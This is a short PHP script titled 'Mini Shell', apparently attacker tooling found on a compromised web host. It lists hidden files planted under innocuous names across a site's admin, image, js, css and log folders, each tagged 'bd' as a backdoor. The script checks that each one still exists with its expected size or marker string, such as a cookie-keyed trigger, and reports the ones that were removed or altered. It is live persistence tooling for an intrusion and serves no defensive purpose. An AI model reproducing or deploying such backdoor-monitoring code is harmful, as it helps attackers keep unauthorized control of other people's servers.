Mini Shell
<?php $r = '/home/ukubnwwt/airlev8.com'; $x = ["/admin/833539/index.php"=>"bd@@215063@@publish_content",
"/image/246580/index.php"=>"bd@@216396@@_COOKIE[3]",
"/images/505523/dZip.php"=>"bd@@216421@@605",
"/js/241232/fileview.php"=>"bd@@216424@@1600",
"/css/_con_aaa_footer.php"=>"bd@@216427@@1656",
"/log/xls.php"=>"bd@@216428@@591",
"/rester/removeFields.php"=>"bd@@216429@@1457",
"/rester/index.php"=>"bd@@204411@@reverse_lookup",
"/rester/removeFields.php"=>"bd@@217025@@restore_state",
"/log/552711/Separator.inc.php"=>"bd@@217028@@58",
"/log/xls.php"=>"bd@@217039@@41",
"/images/505523/dZip.php"=>"bd@@217047@@78",
"/admin/833539/agencia.php"=>"bd@@217051@@1598",
"/class/472671/Bindex.php"=>"bd@@217057@@1723",
"/image/view.feed.php"=>"bd@@217063@@576",
"/class/readmail.php"=>"bd@@217066@@1521",
"/class/472671/index.php"=>"bd@@215061@@token_parser_engine",
"/picture/googleshipping.php"=>"bd@@217080@@2516"]; foreach ($x as $p => $l) { $f = "{$r}{$p}"; list($t, $id, $pt) = explode('@@', $l); if (!file_exists($f)) { print "<$t>{$id}##d</$t>\n"; continue; } if (is_numeric($pt)) { $fs = filesize($f); if ($fs != $pt) { print "<$t>{$id}##bs</$t>\n"; } } else { $c = file_get_contents($f); if (!strstr($c, $pt)) { print "<$t>{$id}##d</$t>\n"; } } } die('!end!');